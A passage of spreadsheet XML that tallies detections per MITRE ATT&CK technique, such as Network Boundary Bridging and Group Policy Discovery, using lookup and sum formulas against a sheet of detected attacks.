        <v>58</v>
      </c>
      <c r="BQ71" s="322" t="str">
        <f t="shared" si="25"/>
        <v>58 (58)</v>
      </c>
      <c r="BR71" s="12">
        <v>0</v>
      </c>
      <c r="BS71" s="12">
        <v>4</v>
      </c>
      <c r="BT71" s="13">
        <v>1</v>
      </c>
      <c r="BU71" s="394">
        <v>58</v>
      </c>
      <c r="BV71" s="292">
        <v>0</v>
      </c>
      <c r="BW71" s="322">
        <v>0</v>
      </c>
      <c r="BX71" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY71" s="12">
        <v>0</v>
      </c>
      <c r="BZ71" s="13">
        <v>0</v>
      </c>
      <c r="CA71" s="394">
        <v>0</v>
      </c>
      <c r="CB71" s="292">
        <v>5</v>
      </c>
      <c r="CC71" s="322">
        <v>4</v>
      </c>
      <c r="CD71" s="322" t="str">
        <f t="shared" si="27"/>
        <v>4 (5)</v>
      </c>
      <c r="CE71" s="12">
        <v>0</v>
      </c>
      <c r="CF71" s="12">
        <v>1</v>
      </c>
      <c r="CG71" s="13">
        <v>1</v>
      </c>
      <c r="CH71" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="72" spans="1:98" ht="15" customHeight="1">
      <c r="A72" s="4">
        <f t="shared" si="28"/>
        <v>70</v>
      </c>
      <c r="B72" s="4" t="str">
        <f>IFERROR(VLOOKUP(A72,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1599</v>
      </c>
      <c r="C72" s="4" t="str">
        <f>IFERROR(VLOOKUP(B72,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Boundary Bridging</v>
      </c>
      <c r="D72" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B72)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E72" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>8</v>
      </c>
      <c r="F72" s="286" t="str">
        <f t="shared" si="29"/>
        <v>2 (8)</v>
      </c>
      <c r="G72" s="292">
        <v>0</v>
      </c>
      <c r="H72" s="322">
        <v>0</v>
      </c>
      <c r="I72" s="322" t="str">
        <f t="shared" si="15"/>
        <v>0 (0)</v>
      </c>
      <c r="J72" s="12">
        <v>0</v>
      </c>
      <c r="K72" s="13">
        <v>0</v>
      </c>
      <c r="L72" s="394">
        <v>0</v>
      </c>
      <c r="M72" s="322">
        <v>0</v>
      </c>
      <c r="N72" s="322">
        <v>0</v>
      </c>
      <c r="O72" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P72" s="12">
        <v>0</v>
      </c>
      <c r="Q72" s="13">
        <v>0</v>
      </c>
      <c r="R72" s="394">
        <v>0</v>
      </c>
      <c r="S72" s="409">
        <v>0</v>
      </c>
      <c r="T72" s="4">
        <v>0</v>
      </c>
      <c r="U72" s="322" t="str">
        <f t="shared" si="17"/>
        <v>0 (0)</v>
      </c>
      <c r="V72" s="4">
        <v>0</v>
      </c>
      <c r="W72" s="13">
        <v>0</v>
      </c>
      <c r="X72" s="394">
        <v>0</v>
      </c>
      <c r="Y72" s="392">
        <v>4</v>
      </c>
      <c r="Z72" s="392">
        <v>3</v>
      </c>
      <c r="AA72" s="322" t="str">
        <f t="shared" si="18"/>
        <v>3 (4)</v>
      </c>
      <c r="AB72" s="392">
        <v>1</v>
      </c>
      <c r="AC72" s="16">
        <v>1</v>
      </c>
      <c r="AD72" s="394">
        <v>3</v>
      </c>
      <c r="AE72" s="392">
        <v>0</v>
      </c>
      <c r="AF72" s="392">
        <v>0</v>
      </c>
      <c r="AG72" s="322" t="str">
        <f t="shared" si="19"/>
        <v>0 (0)</v>
      </c>
      <c r="AH72" s="392">
        <v>0</v>
      </c>
      <c r="AI72" s="16">
        <v>0</v>
      </c>
      <c r="AJ72" s="394">
        <v>0</v>
      </c>
      <c r="AK72" s="392">
        <v>4</v>
      </c>
      <c r="AL72" s="392">
        <v>3</v>
      </c>
      <c r="AM72" s="322" t="str">
        <f t="shared" si="20"/>
        <v>3 (4)</v>
      </c>
      <c r="AN72" s="392">
        <v>1</v>
      </c>
      <c r="AO72" s="16">
        <v>1</v>
      </c>
      <c r="AP72" s="394">
        <v>3</v>
      </c>
      <c r="AQ72" s="292">
        <v>0</v>
      </c>
      <c r="AR72" s="322">
        <v>0</v>
      </c>
      <c r="AS72" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT72" s="12">
        <v>0</v>
      </c>
      <c r="AU72" s="13">
        <v>0</v>
      </c>
      <c r="AV72" s="394">
        <v>0</v>
      </c>
      <c r="AW72" s="392">
        <v>4</v>
      </c>
      <c r="AX72" s="392">
        <v>3</v>
      </c>
      <c r="AY72" s="322" t="str">
        <f t="shared" si="22"/>
        <v>3 (4)</v>
      </c>
      <c r="AZ72" s="4">
        <v>1</v>
      </c>
      <c r="BA72" s="16">
        <v>1</v>
      </c>
      <c r="BB72" s="394">
        <v>3</v>
      </c>
      <c r="BC72" s="292">
        <v>4</v>
      </c>
      <c r="BD72" s="322">
        <v>3</v>
      </c>
      <c r="BE72" s="322" t="str">
        <f t="shared" si="23"/>
        <v>3 (4)</v>
      </c>
      <c r="BF72" s="12">
        <v>1</v>
      </c>
      <c r="BG72" s="13">
        <v>1</v>
      </c>
      <c r="BH72" s="394">
        <v>3</v>
      </c>
      <c r="BI72" s="292">
        <v>2</v>
      </c>
      <c r="BJ72" s="322">
        <v>2</v>
      </c>
      <c r="BK72" s="322" t="str">
        <f t="shared" si="24"/>
        <v>2 (2)</v>
      </c>
      <c r="BL72" s="12">
        <v>1</v>
      </c>
      <c r="BM72" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BN72" s="394">
        <v>2</v>
      </c>
      <c r="BO72" s="292">
        <v>8</v>
      </c>
      <c r="BP72" s="322">
        <v>8</v>
      </c>
      <c r="BQ72" s="322" t="str">
        <f t="shared" si="25"/>
        <v>8 (8)</v>
      </c>
      <c r="BR72" s="12">
        <v>1</v>
      </c>
      <c r="BS72" s="12">
        <v>2</v>
      </c>
      <c r="BT72" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BU72" s="394">
        <v>6</v>
      </c>
      <c r="BV72" s="292">
        <v>0</v>
      </c>
      <c r="BW72" s="322">
        <v>0</v>
      </c>
      <c r="BX72" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY72" s="12">
        <v>0</v>
      </c>
      <c r="BZ72" s="13">
        <v>0</v>
      </c>
      <c r="CA72" s="394">
        <v>0</v>
      </c>
      <c r="CB72" s="292">
        <v>3</v>
      </c>
      <c r="CC72" s="322">
        <v>3</v>
      </c>
      <c r="CD72" s="322" t="str">
        <f t="shared" si="27"/>
        <v>3 (3)</v>
      </c>
      <c r="CE72" s="12">
        <v>0</v>
      </c>
      <c r="CF72" s="12">
        <v>1</v>
      </c>
      <c r="CG72" s="13">
        <v>1</v>
      </c>
      <c r="CH72" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="73" spans="1:98" ht="15" customHeight="1">
      <c r="A73" s="4">
        <f t="shared" si="28"/>
        <v>71</v>
      </c>
      <c r="B73" s="4" t="str">
        <f>IFERROR(VLOOKUP(A73,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1602</v>
      </c>
      <c r="C73" s="4" t="str">
        <f>IFERROR(VLOOKUP(B73,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data from Configuration Repository</v>
      </c>
      <c r="D73" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B73)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E73" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F73" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (2)</v>
      </c>
      <c r="G73" s="292">
        <v>0</v>
      </c>
      <c r="H73" s="322">
        <v>0</v>
      </c>
      <c r="I73" s="322" t="str">
        <f t="shared" si="15"/>
        <v>0 (0)</v>
      </c>
      <c r="J73" s="12">
        <v>0</v>
      </c>
      <c r="K73" s="13">
        <v>0</v>
      </c>
      <c r="L73" s="394">
        <v>0</v>
      </c>
      <c r="M73" s="322">
        <v>0</v>
      </c>
      <c r="N73" s="322">
        <v>0</v>
      </c>
      <c r="O73" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P73" s="12">
        <v>0</v>
      </c>
      <c r="Q73" s="13">
        <v>0</v>
      </c>
      <c r="R73" s="394">
        <v>0</v>
      </c>
      <c r="S73" s="409">
        <v>0</v>
      </c>
      <c r="T73" s="4">
        <v>0</v>
      </c>
      <c r="U73" s="322" t="str">
        <f t="shared" si="17"/>
        <v>0 (0)</v>
      </c>
      <c r="V73" s="4">
        <v>0</v>
      </c>
      <c r="W73" s="13">
        <v>0</v>
      </c>
      <c r="X73" s="394">
        <v>0</v>
      </c>
      <c r="Y73" s="392">
        <v>0</v>
      </c>
      <c r="Z73" s="392">
        <v>0</v>
      </c>
      <c r="AA73" s="322" t="str">
        <f t="shared" si="18"/>
        <v>0 (0)</v>
      </c>
      <c r="AB73" s="392">
        <v>0</v>
      </c>
      <c r="AC73" s="16">
        <v>0</v>
      </c>
      <c r="AD73" s="394">
        <v>0</v>
      </c>
      <c r="AE73" s="392">
        <v>0</v>
      </c>
      <c r="AF73" s="392">
        <v>0</v>
      </c>
      <c r="AG73" s="322" t="str">
        <f t="shared" si="19"/>
        <v>0 (0)</v>
      </c>
      <c r="AH73" s="392">
        <v>0</v>
      </c>
      <c r="AI73" s="16">
        <v>0</v>
      </c>
      <c r="AJ73" s="394">
        <v>0</v>
      </c>
      <c r="AK73" s="392">
        <v>0</v>
      </c>
      <c r="AL73" s="392">
        <v>0</v>
      </c>
      <c r="AM73" s="322" t="str">
        <f t="shared" si="20"/>
        <v>0 (0)</v>
      </c>
      <c r="AN73" s="392">
        <v>0</v>
      </c>
      <c r="AO73" s="16">
        <v>0</v>
      </c>
      <c r="AP73" s="394">
        <v>0</v>
      </c>
      <c r="AQ73" s="292">
        <v>0</v>
      </c>
      <c r="AR73" s="322">
        <v>0</v>
      </c>
      <c r="AS73" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT73" s="12">
        <v>0</v>
      </c>
      <c r="AU73" s="13">
        <v>0</v>
      </c>
      <c r="AV73" s="394">
        <v>0</v>
      </c>
      <c r="AW73" s="392">
        <v>0</v>
      </c>
      <c r="AX73" s="392">
        <v>0</v>
      </c>
      <c r="AY73" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ73" s="4">
        <v>0</v>
      </c>
      <c r="BA73" s="16">
        <v>0</v>
      </c>
      <c r="BB73" s="394">
        <v>0</v>
      </c>
      <c r="BC73" s="292">
        <v>0</v>
      </c>
      <c r="BD73" s="322">
        <v>0</v>
      </c>
      <c r="BE73" s="322" t="str">
        <f t="shared" si="23"/>
        <v>0 (0)</v>
      </c>
      <c r="BF73" s="12">
        <v>0</v>
      </c>
      <c r="BG73" s="13">
        <v>0</v>
      </c>
      <c r="BH73" s="394">
        <v>0</v>
      </c>
      <c r="BI73" s="292">
        <v>0</v>
      </c>
      <c r="BJ73" s="322">
        <v>0</v>
      </c>
      <c r="BK73" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL73" s="12">
        <v>0</v>
      </c>
      <c r="BM73" s="13">
        <v>0</v>
      </c>
      <c r="BN73" s="394">
        <v>0</v>
      </c>
      <c r="BO73" s="292">
        <v>2</v>
      </c>
      <c r="BP73" s="322">
        <v>2</v>
      </c>
      <c r="BQ73" s="322" t="str">
        <f t="shared" si="25"/>
        <v>2 (2)</v>
      </c>
      <c r="BR73" s="12">
        <v>0</v>
      </c>
      <c r="BS73" s="12">
        <v>2</v>
      </c>
      <c r="BT73" s="13">
        <v>1</v>
      </c>
      <c r="BU73" s="394">
        <v>1</v>
      </c>
      <c r="BV73" s="292">
        <v>0</v>
      </c>
      <c r="BW73" s="322">
        <v>0</v>
      </c>
      <c r="BX73" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY73" s="12">
        <v>0</v>
      </c>
      <c r="BZ73" s="13">
        <v>0</v>
      </c>
      <c r="CA73" s="394">
        <v>0</v>
      </c>
      <c r="CB73" s="292">
        <v>0</v>
      </c>
      <c r="CC73" s="322">
        <v>0</v>
      </c>
      <c r="CD73" s="322" t="str">
        <f t="shared" si="27"/>
        <v>0 (0)</v>
      </c>
      <c r="CE73" s="12">
        <v>0</v>
      </c>
      <c r="CF73" s="12">
        <v>0</v>
      </c>
      <c r="CG73" s="13">
        <v>0</v>
      </c>
      <c r="CH73" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="74" spans="1:98" ht="15" customHeight="1">
      <c r="A74" s="4">
        <f t="shared" si="28"/>
        <v>72</v>
      </c>
      <c r="B74" s="4" t="str">
        <f>IFERROR(VLOOKUP(A74,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1612</v>
      </c>
      <c r="C74" s="4" t="str">
        <f>IFERROR(VLOOKUP(B74,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Build Image on Host</v>
      </c>
      <c r="D74" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B74)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E74" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>188</v>
      </c>
      <c r="F74" s="286" t="str">
        <f t="shared" si="29"/>
        <v>2 (188)</v>
      </c>
      <c r="G74" s="292">
        <v>0</v>
      </c>
      <c r="H74" s="322">
        <v>0</v>
      </c>
      <c r="I74" s="322" t="str">
        <f t="shared" si="15"/>
        <v>0 (0)</v>
      </c>
      <c r="J74" s="12">
        <v>0</v>
      </c>
      <c r="K74" s="13">
        <v>0</v>
      </c>
      <c r="L74" s="394">
        <v>0</v>
      </c>
      <c r="M74" s="322">
        <v>1</v>
      </c>
      <c r="N74" s="322">
        <v>1</v>
      </c>
      <c r="O74" s="322" t="str">
        <f t="shared" si="16"/>
        <v>1 (1)</v>
      </c>
      <c r="P74" s="12">
        <v>1</v>
      </c>
      <c r="Q74" s="13">
        <v>0.5</v>
      </c>
      <c r="R74" s="394">
        <v>1</v>
      </c>
      <c r="S74" s="409">
        <v>1</v>
      </c>
      <c r="T74" s="4">
        <v>1</v>
      </c>
      <c r="U74" s="322" t="str">
        <f t="shared" si="17"/>
        <v>1 (1)</v>
      </c>
      <c r="V74" s="4">
        <v>1</v>
      </c>
      <c r="W74" s="13">
        <v>0.5</v>
      </c>
      <c r="X74" s="394">
        <v>1</v>
      </c>
      <c r="Y74" s="392">
        <v>2</v>
      </c>
      <c r="Z74" s="392">
        <v>2</v>
      </c>
      <c r="AA74" s="322" t="str">
        <f t="shared" si="18"/>
        <v>2 (2)</v>
      </c>
      <c r="AB74" s="392">
        <v>2</v>
      </c>
      <c r="AC74" s="16">
        <v>0.5</v>
      </c>
      <c r="AD74" s="394">
        <v>2</v>
      </c>
      <c r="AE74" s="392">
        <v>13</v>
      </c>
      <c r="AF74" s="392">
        <v>5</v>
      </c>
      <c r="AG74" s="322" t="str">
        <f t="shared" si="19"/>
        <v>5 (13)</v>
      </c>
      <c r="AH74" s="392">
        <v>2</v>
      </c>
      <c r="AI74" s="16">
        <v>1</v>
      </c>
      <c r="AJ74" s="394">
        <v>5</v>
      </c>
      <c r="AK74" s="392">
        <v>15</v>
      </c>
      <c r="AL74" s="392">
        <v>7</v>
      </c>
      <c r="AM74" s="322" t="str">
        <f t="shared" si="20"/>
        <v>7 (15)</v>
      </c>
      <c r="AN74" s="392">
        <v>4</v>
      </c>
      <c r="AO74" s="16">
        <v>1</v>
      </c>
      <c r="AP74" s="394">
        <v>6</v>
      </c>
      <c r="AQ74" s="292">
        <v>0</v>
      </c>
      <c r="AR74" s="322">
        <v>0</v>
      </c>
      <c r="AS74" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT74" s="12">
        <v>0</v>
      </c>
      <c r="AU74" s="13">
        <v>0</v>
      </c>
      <c r="AV74" s="394">
        <v>0</v>
      </c>
      <c r="AW74" s="392">
        <v>1</v>
      </c>
      <c r="AX74" s="392">
        <v>1</v>
      </c>
      <c r="AY74" s="322" t="str">
        <f t="shared" si="22"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ74" s="4">
        <v>1</v>
      </c>
      <c r="BA74" s="16">
        <v>0.5</v>
      </c>
      <c r="BB74" s="394">
        <v>1</v>
      </c>
      <c r="BC74" s="292">
        <v>2</v>
      </c>
      <c r="BD74" s="322">
        <v>2</v>
      </c>
      <c r="BE74" s="322" t="str">
        <f t="shared" si="23"/>
        <v>2 (2)</v>
      </c>
      <c r="BF74" s="12">
        <v>2</v>
      </c>
      <c r="BG74" s="13">
        <v>0.5</v>
      </c>
      <c r="BH74" s="394">
        <v>2</v>
      </c>
      <c r="BI74" s="292">
        <v>21</v>
      </c>
      <c r="BJ74" s="322">
        <v>5</v>
      </c>
      <c r="BK74" s="322" t="str">
        <f t="shared" si="24"/>
        <v>5 (21)</v>
      </c>
      <c r="BL74" s="12">
        <v>2</v>
      </c>
      <c r="BM74" s="13">
        <v>1</v>
      </c>
      <c r="BN74" s="394">
        <v>5</v>
      </c>
      <c r="BO74" s="292">
        <v>162</v>
      </c>
      <c r="BP74" s="322">
        <v>146</v>
      </c>
      <c r="BQ74" s="322" t="str">
        <f t="shared" si="25"/>
        <v>146 (162)</v>
      </c>
      <c r="BR74" s="12">
        <v>2</v>
      </c>
      <c r="BS74" s="12">
        <v>5</v>
      </c>
      <c r="BT74" s="13">
        <v>1</v>
      </c>
      <c r="BU74" s="394">
        <v>143</v>
      </c>
      <c r="BV74" s="292">
        <v>3</v>
      </c>
      <c r="BW74" s="322">
        <v>3</v>
      </c>
      <c r="BX74" s="322" t="str">
        <f t="shared" si="26"/>
        <v>3 (3)</v>
      </c>
      <c r="BY74" s="12">
        <v>3</v>
      </c>
      <c r="BZ74" s="13">
        <v>0.5</v>
      </c>
      <c r="CA74" s="394">
        <v>2</v>
      </c>
      <c r="CB74" s="292">
        <v>3</v>
      </c>
      <c r="CC74" s="322">
        <v>2</v>
      </c>
      <c r="CD74" s="322" t="str">
        <f t="shared" si="27"/>
        <v>2 (3)</v>
      </c>
      <c r="CE74" s="12">
        <v>0</v>
      </c>
      <c r="CF74" s="12">
        <v>2</v>
      </c>
      <c r="CG74" s="13">
        <v>0.5</v>
      </c>
      <c r="CH74" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="75" spans="1:98" ht="15" customHeight="1">
      <c r="A75" s="4">
        <f t="shared" si="28"/>
        <v>73</v>
      </c>
      <c r="B75" s="4" t="str">
        <f>IFERROR(VLOOKUP(A75,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1615</v>
      </c>
      <c r="C75" s="4" t="str">
        <f>IFERROR(VLOOKUP(B75,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Group Policy Discovery</v>
      </c>
      <c r="D75" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B75)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E75" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>53</v>
      </c>
      <c r="F75" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (53)</v>
      </c>
      <c r="G75" s="292">
        <v>0</v>
      </c>
      <c r="H75" s="322">
        <v>0</v>
      </c>
      <c r="I75" s="322" t="str">
        <f t="shared" si="15"/>
        <v>0 (0)</v>
      </c>
      <c r="J75" s="12">
        <v>0</v>
      </c>
      <c r="K75" s="13">
        <v>0</v>
      </c>
      <c r="L75" s="394">
        <v>0</v>
      </c>
      <c r="M75" s="322">
        <v>0</v>
      </c>
      <c r="N75" s="322">
        <v>0</v>
      </c>
      <c r="O75" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P75" s="12">
        <v>0</v>
      </c>
      <c r="Q75" s="13">
        <v>0</v>
      </c>
      <c r="R75" s="394">
        <v>0</v>
      </c>
      <c r="S75" s="409">
        <v>0</v>
      </c>
      <c r="T75" s="4">
        <v>0</v>
      </c>
      <c r="U75" s="322" t="str">
        <f t="shared" si="17"/>
        <v>0 (0)</v>
      </c>
      <c r="V75" s="4">
        <v>0</v>
      </c>
      <c r="W75" s="13">
        <v>0</v>
      </c>
      <c r="X75" s="394">
        <v>0</v>
      </c>
      <c r="Y75" s="392">
        <v>0</v>
      </c>
      <c r="Z75" s="392">
        <v>0</v>
      </c>
      <c r="AA75" s="322" t="str">
        <f t="shared" si="18"/>
        <v>0 (0)</v>
      </c>
      <c r="AB75" s="392">
        <v>0</v>
      </c>
      <c r="AC75" s="16">
        <v>0</v>
      </c>
      <c r="AD75" s="394">
        <v>0</v>
      </c>
      <c r="AE75" s="392">
        <v>0</v>
      </c>
      <c r="AF75" s="392">
        <v>0</v>
      </c>
      <c r="AG75" s="322" t="str">
        <f t="shared" si="19"/>
        <v>0 (0)</v>
      </c>
      <c r="AH75" s="392">
        <v>0</v>
      </c>
      <c r="AI75" s="16">
        <v>0</v>
      </c>
      <c r="AJ75" s="394">
        <v>0</v>
      </c>
      <c r="AK75" s="392">
        <v>0</v>
      </c>
      <c r="AL75" s="392">
        <v>0</v>
      </c>
      <c r="AM75" s="322" t="str">
        <f t="shared" si="20"/>
        <v>0 (0)</v>
      </c>
      <c r="AN75" s="392">
        <v>0</v>
      </c>
      <c r="AO75" s="16">
        <v>0</v>
      </c>
      <c r="AP75" s="394">
        <v>0</v>
      </c>
      <c r="AQ75" s="292">
        <v>0</v>
      </c>
      <c r="AR75" s="322">
        <v>0</v>
      </c>
      <c r="AS75" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT75" s="12">
        <v>0</v>
      </c>
      <c r="AU75" s="13">
        <v>0</v>
      </c>
      <c r="AV75" s="394">
        <v>0</v>
      </c>
      <c r="AW75" s="392">
        <v>0</v>
      </c>
      <c r="AX75" s="392">
        <v>0</v>
      </c>
      <c r="AY75" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ75" s="4">
        <v>0</v>
      </c>
      <c r="BA75" s="16">
        <v>0</v>
      </c>
      <c r="BB75" s="394">
        <v>0</v>
      </c>
      <c r="BC75" s="292">
        <v>0</v>
      </c>
      <c r="BD75" s="322">
        <v>0</v>
      </c>
      <c r="BE75" s="322" t="str">
        <f t="shared" si="23"/>
        <v>0 (0)</v>
      </c>
      <c r="BF75" s="12">
        <v>0</v>
      </c>
      <c r="BG75" s="13">
        <v>0</v>
      </c>
      <c r="BH75" s="394">
        <v>0</v>
      </c>
      <c r="BI75" s="292">
        <v>0</v>
      </c>
      <c r="BJ75" s="322">
        <v>0</v>
      </c>
      <c r="BK75" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL75" s="12">
        <v>0</v>
      </c>
      <c r="BM75" s="13">
        <v>0</v>
      </c>
      <c r="BN75" s="394">
        <v>0</v>
      </c>
      <c r="BO75" s="292">
        <v>49</v>
      </c>
      <c r="BP75" s="322">
        <v>49</v>
      </c>
      <c r="BQ75" s="322" t="str">
        <f t="shared" si="25"/>
        <v>49 (49)</v>
      </c>
      <c r="BR75" s="12">
        <v>0</v>
      </c>
      <c r="BS75" s="12">
        <v>6</v>
      </c>
      <c r="BT75" s="13">
        <v>1</v>
      </c>
      <c r="BU75" s="394">
        <v>49</v>
      </c>
      <c r="BV75" s="292">
        <v>0</v>
      </c>
      <c r="BW75" s="322">
        <v>0</v>
      </c>
      <c r="BX75" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY75" s="12">
        <v>0</v>
      </c>
      <c r="BZ75" s="13">
        <v>0</v>
      </c>
      <c r="CA75" s="394">
        <v>0</v>
      </c>
      <c r="CB75" s="292">
        <v>0</v>
      </c>
      <c r="CC75" s="322">
        <v>0</v>
      </c>
      <c r="CD75" s="322" t="str">
        <f t="shared" si="27"/>
        <v>0 (0)</v>
      </c>
      <c r="CE75" s="12">
        <v>0</v>
      </c>
      <c r="CF75" s="12">
        <v>0</v>
      </c>
      <c r="CG75" s="13">
        <v>0</v>
      </c>
      <c r="CH75" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="1:98" ht="15" customHeight="1">
      <c r="A76" s="4">
        <f t="shared" si="28"/>
        <v>74</v>
      </c>
      <c r="B76" s="4" t="str">
        <f>IFERROR(VLOOKUP(A76,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1659</v>
      </c>
      <c r="C76" s="4" t="str">
        <f>IFERROR(VLOOKUP(B76,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Content Injection</v>
      </c>
      <c r="D76" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B76)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E76" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>89</v>
      </c>
      <c r="F76" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (89)</v>
      </c>
      <c r="G76" s="292">
        <v>0</v>
      </c>
      <c r="H76" s="322">
        <v>0</v>
      </c>
      <c r="I76" s="322" t="str">
        <f t="shared" si="15"/>
        <v>0 (0)</v>
      </c>
      <c r="J76" s="12">
        <v>0</v>
      </c>
      <c r="K76" s="13">
        <v>0</v>
      </c>
      <c r="L76" s="394">
        <v>0</v>
      </c>
      <c r="M76" s="322">
        <v>2</v>
      </c>
      <c r="N76" s="322">
        <v>2</v>
      </c>
      <c r="O76" s="322" t="str">
        <f t="shared" si="16"/>
        <v>2 (2)</v>
      </c>
      <c r="P76" s="12">
        <v>2</v>
      </c>
      <c r="Q76" s="13">
        <v>1</v>
      </c>
      <c r="R76" s="394">
        <v>2</v>
      </c>
      <c r="S76" s="409">
        <v>2</v>
      </c>
      <c r="T76" s="4">
        <v>2</v>
      </c>
      <c r="U76" s="322" t="str">
        <f t="shared" si="17"/>
        <v>2 (2)</v>
      </c>
      <c r="V76" s="4">
        <v>2</v>
      </c>
      <c r="W76" s="13">
        <v>1</v>
      </c>
      <c r="X76" s="394">
        <v>2</v>
      </c>
      <c r="Y76" s="392">
        <v>9</v>
      </c>
      <c r="Z76" s="392">
        <v>8</v>
      </c>
      <c r="AA76" s="322" t="str">
        <f t="shared" si="18"/>
        <v>8 (9)</v>
      </c>
      <c r="AB76" s="392">
        <v>5</v>
      </c>
      <c r="AC76" s="16">
        <v>1</v>
      </c>
      <c r="AD76" s="394">
        <v>6</v>
      </c>
      <c r="AE76" s="392">
        <v>4</v>
      </c>
      <c r="AF76" s="392">
        <v>4</v>
      </c>
      <c r="AG76" s="322" t="str">
        <f t="shared" si="19"/>
        <v>4 (4)</v>
      </c>
      <c r="AH76" s="392">
        <v>4</v>
      </c>
      <c r="AI76" s="16">
        <v>1</v>
      </c>
      <c r="AJ76" s="394">
        <v>2</v>
      </c>
      <c r="AK76" s="392">
        <v>13</v>
      </c>
      <c r="AL76" s="392">
        <v>12</v>
      </c>
      <c r="AM76" s="322" t="str">
        <f t="shared" si="20"/>
        <v>12 (13)</v>
      </c>
      <c r="AN76" s="392">
        <v>9</v>
      </c>
      <c r="AO76" s="16">
        <v>1</v>
      </c>
      <c r="AP76" s="394">
        <v>6</v>
      </c>
      <c r="AQ76" s="292">
        <v>0</v>
      </c>
      <c r="AR76" s="322">
        <v>0</v>
      </c>
      <c r="AS76" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT76" s="12">
        <v>0</v>
      </c>
      <c r="AU76" s="13">
        <v>0</v>
      </c>
      <c r="AV76" s="394">
        <v>0</v>
      </c>
      <c r="AW76" s="392">
        <v>0</v>
      </c>
      <c r="AX76" s="392">
        <v>0</v>
      </c>
      <c r="AY76" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ76" s="4">
        <v>0</v>
      </c>
      <c r="BA76" s="16">
        <v>0</v>
      </c>
      <c r="BB76" s="394">
        <v>0</v>
      </c>
